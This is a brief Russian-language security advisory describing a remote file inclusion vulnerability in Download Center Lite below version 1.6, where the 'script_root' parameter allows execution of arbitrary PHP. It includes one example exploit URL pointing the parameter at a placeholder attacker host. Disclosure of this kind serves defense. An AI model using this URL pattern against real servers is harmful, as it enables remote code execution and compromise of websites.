Программа: Download Center Lite версии до 1.6

Обнаруженная уязвимость позволяет
удаленному пользователю выполнить
произвольные команды на уязвимой системе с
привилегиями web сервера. Уязвимость
существует в сценарии ‘inc/download_center_lite.inc.php’ из-за
некорректной фильтрации данных с параметре
‘script_root’. Удаленный пользователь может с
помощью специально сформированного URL
выполнить произвольный php сценарий с
привилегиями web сервера.

Пример:

http://[target]/[dir]/inc/download_center_lite.inc.php?script_root=http://[attacker]/

Оставить мнение